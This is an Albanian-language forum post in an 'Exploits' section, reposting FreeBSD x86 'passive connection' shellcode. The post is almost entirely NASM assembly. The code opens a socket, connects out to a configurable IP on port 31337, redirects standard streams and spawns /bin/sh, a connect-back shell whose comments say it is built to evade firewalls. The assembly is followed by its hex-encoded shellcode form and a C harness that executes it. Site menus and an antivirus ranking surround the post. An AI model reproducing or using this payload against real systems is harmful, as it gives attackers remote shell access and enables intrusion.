ForumPortaliGalleryPytėsoriKėrkoLista AnėtarėveGrupet e AnėtarėveRegjistrohuidentifikimi
...:::Meny Kryesore:::...
 Home
 Portali
 Forum
 Lista e Antarve
 Galeria
 Lajmet Flash
 Profili
 FAQ
 Testi I Dashuris
favoritos.gif Media & Muzika
 Telivizionet Live
 Video Klipe
 Ruzulltatet Sportive
 Mp3 Falass
 Mp3 RAP
 Kerkesa Muzikore
 Melodi Per Celular
icon_community.gif Argėtim-Zbavitje
 Video Humoristike
 Luani Lojra
 Dezing
 Poezi
 Gediche
 Argėtime
 Albumi Fotografik
 Tema tė Ndryshme
som_downloads.gif Shkarkime & Links
King-Rap Tolbar
Programe
Shkarko Scripte
Chat Programs
 Kėrko nė Forum
 Liderėt e forumit
 Ndihmė
 Kėrko
Moti Momental

Permbajta e ksaj faqe kerkon flash player per instalim kliko mbi ket tekst.


Futu nė chat

Top 5 softuerėt antivirus pėr 2008
HTML clipboard
Top 5 softuerėt antivirus pėr 2008

1. Bit Defender

2. Kaspersky

3. Eset NOD32

4. Trend Micro Antivirus

    plus AntiSpyware 

5. F-Secure Anti-Virus 

SMS Falas nga KING-RaP
Partnerėt
>>> AlBaZeMeR <<<

XoFaCe

->>Ks-MaX <<<---

->> KoSoVa.Li <<<---

 ->> Muzik-Anglisht <<<---

V.I.P Galeri

Top posters
kanuni
 
Xhebraili
 
vissari
 
El-Fuego
 
drini-89
 
RiRi
 
dj-baba
 
dosti
 
king
 
miri
 
Keywords
loja krasniqi numrin nokia shqip BAJRAM druri shkronja murlan kosoves numri PORNO ismajli meda nika dashuri 2012 komandat gashi anglisht genta double gjata elvana dashurie celular
IP Addressa Juaj&Reklama
IP


Share | 
 

 BSD Passive Connection Shellcode

Shiko temėn e mėparshme Shiko temėn pasuese Shko poshtė 
AutoriMesazh
El-Fuego



Numri i postimeve : 159
Join date : 12/06/2008
Age : 104
Location : Peja Morder City

MesazhTitulli: BSD Passive Connection Shellcode   Thu Jun 12, 2008 8:11 pm

; Passive Connection Shellcode
;
; Coded by Scrippie - ronald@grafix.nl - http://b0f.freebsd.lublin.pl
; Buffer0verfl0w Security
; Why? This evades firewalls...
;
; YES, this is for NASM, I detest AT&T syntaxis - it's gross and unreadable
;
; This is the FreeBSD variant I whipped up
;
; Tnx to dvorak for pointing out that BSD's int 80h assumes a stored EIP
; on the stack before making it and that BSD has a somewhat different
; sockaddr_in structure (containing sin_len)

BITS 32

; Equates - keeps this stuff a lot more clear

PORT equ 31337 ; What an eleet port!

_exit equ 1 ; See /usr/src/sys/kern/syscalls.c
execve equ 59 ; See /usr/src/sys/kern/syscalls.c
dup2 equ 90 ; See /usr/src/sys/kern/syscalls.c
socket equ 97 ; See /usr/src/sys/kern/syscalls.c
connect equ 98 ; See /usr/src/sys/kern/syscalls.c

IPPROTO_TCP equ 6 ; See netinet/in.h
PF_INET equ 2 ; See sys/socket.h
SOCK_STREAM equ 1 ; See sys/socket.h

sockaddr_in_off equ 0
shell_off equ 8
shell_ptr_off equ 16

jmp short EndCode

Start:
pop esi ; Get offset data in esi

xor eax, eax
xor ebx, ebx

mov bl, IPPROTO_TCP ; Push IPPROTO_TCP
push ebx
mov bl, SOCK_STREAM ; Push SOCK_STREAM
push ebx
mov bl, PF_INET ; Push PF_INET
push ebx
push ebx ; Skipped by int 80h
mov al, socket ; Select socket() syscall

int 80h ; socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
mov edx, eax ; Save the resulting socket descriptor

mov byte [esi+sockaddr_in_off+1], PF_INET ; sin_family -> PF_INET
mov word [esi+sockaddr_in_off+2], PORT ; Set the port number

mov bl, 16 ; sizeof(sockaddr_in)
push ebx

lea ebx, [esi+sockaddr_in_off] ; Get offset sockaddr_in into ebx
push ebx ; Push it
push eax ; Still holds sockfd
push eax ; Canary value

mov al, connect ; Select connect() syscall
int 80h ; connect(sockfd, sockaddr_in, 10)

xor ebx, ebx
push ebx
push edx
mov al, dup2 ; Select dup2 syscall

push eax ; Ruined
int 80h

inc bl
push ebx
push edx
mov al, dup2 ; Do the same for stdout

push eax
int 80h

inc bl
push ebx
push edx
mov al, dup2 ; And finally for stderr

push eax
int 80h

xor ebx, ebx
push ebx ; *envp == NULL

lea edi, [esi+shell_off+7]
xor eax, eax
xor ecx, ecx
mov cl, 9
repe stosb

lea ebx, [esi+shell_off] ; Get offset shell into ebx
mov [esi+shell_ptr_off], ebx ; Store it at shell_off
lea ecx, [esi+shell_ptr_off] ; Get offset shell_off into ecx
push ecx ; argp
push ebx ; command

push eax ; canary
mov al, execve
int 80h ; Spawn the frikkin' shell

mov al, _exit ; _exit() system call
int 80h ; Do it

EndCode:
call Start

sockaddr_in db 'ABCC' ; A=sin_len - B=sin_family - C=port
dd 0x100007f ; IP addr (s_addr) in htonl() form
; 8 bytes not needed Wink

shell db '/bin/sh' ;,0
;shell_ptr db 1,2,3,4

------------------------------------------------------------------------------

And here's the shellcode equivalent

char shellcode[]=
"\xeb\x68\x5e\x31\xc0\x31\xdb\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x53\xb0\x61\x
cd\x80\x89\xc2\xc6\x46\x01\x02\x66\xc7\x46\x02\x69\x7a\xb3\x10\x53\x8d\x1e\x53\
x50\x50\xb0\x62\xcd\x80\x31\xdb\x53\x52\xb0\x5a\x50\xcd\x80\xfe\xc3\x53\x52\xb0
\x5a\x50\xcd\x80\xfe\xc3\x53\x52\xb0\x5a\x50\xcd\x80\x31\xdb\x53\x8d\x7e\x0f\x3
1\xc0\x31\xc9\xb1\x09\xf3\xaa\x8d\x5e\x08\x89\x5e\x10\x8d\x4e\x10\x51\x53\x50\x
b0\x3b\xcd\x80\xb0\x01\xcd\x80\xe8\x93\xff\xff\xff\x41\x42\x43\x43\x7f\x00\x00\
x01\x2f\x62\x69\x6e\x2f\x73\x68"; ^
Start of IP addr
void main() {
int *ret;

ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}
Mbrapsht nė krye Shko poshtė
Shiko profilin e anėtarit
 
BSD Passive Connection Shellcode
Shiko temėn e mėparshme Shiko temėn pasuese Mbrapsht nė krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
 :: ..:: INFORMATIKA ::.. :: Exploits-
Kėrce tek: